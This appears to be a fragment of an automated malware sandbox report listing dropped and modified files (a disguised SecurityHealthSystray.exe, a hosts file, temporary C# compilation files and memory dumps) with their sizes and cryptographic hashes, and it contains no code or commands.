5760c32f11f1824dadfd9222ad8d86a9

SHA1
050ea8ff51c1e9f4c81219c2415f4d560b17cd94

SHA256
a456a175b494df9fdf2de45c394535fb8ea6a13685cf9dadb075de18b4e0806a

SHA512
22f547feeabfbd4d9c0dd411833bdfef543cde798b4f7da5ccd1a0e9207332a11653a34ca4f5e2e683e75770a006b3b09202b205debff212a9b2069ad32d300a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe

Filesize
11.8MB

MD5
44d806942d0bbc5f4302867243b66a18

SHA1
4405cd3f84680d4888ef7f9fb0a651c82b3573b9

SHA256
758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5

SHA512
661aeb2b1037c1ef446056f8f71a0d4f2eba8702072b931c87604ac58f408d93c1fcb2cc04b1fceb312318361b3c88e3e94c8ab0e318e4e8a669f81950a5c6f9

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
6e2386469072b80f18d5722d07afdc0b

SHA1
032d13e364833d7276fcab8a5b2759e79182880f

SHA256
ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

SHA512
e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2c5bufot\2c5bufot.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2c5bufot\2c5bufot.cmdline

Filesize
607B

MD5
d915458a784a9293788daf59e7321f36

SHA1
b4cb319f8539b74848c9ef5d433e0ea4c992b0a1

SHA256
bf86e4abb923860fe53c0cfb68e1306f5f630c77520af183176b39febf291b47

SHA512
c25b8fa45b9ede307477eaa529ba62e07025f859bbbddffdc56314939c9a2999057b2fd5675322cd95f31c5b079819051dc56586a15d2ca8b39d627f2785a5c4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2c5bufot\CSCDF5F2315B61940FFB38BA89AB5D4C057.TMP

Filesize
652B

MD5
e95ab5df9fdc63e9f7f2e216e3894347

SHA1
ad6c007b1d9152bdbe83e7a6c6fddfce02a2facc

SHA256
a6ccced203438aac8ebf4595a8a40917d598b001979eb4c4d78adb2cc56ece7a

SHA512
2c94c3c9bf90b33e8496c0540671d17fff233935387005dc4ffe79cb3b64e3048c32c5dc6c71e6dc1cccfed98562a5da568aaa38e83b070b9ce6817b3ae958b3

Download Submit
memory/2364-61-0x00000288F3920000-0x00000288F3928000-memory.dmp

Filesize
32KB

Download
memory/2892-3-0x0000026F6AC40000-0x0000026F6AC62000-memory.dmp

Filesize
136KB

Download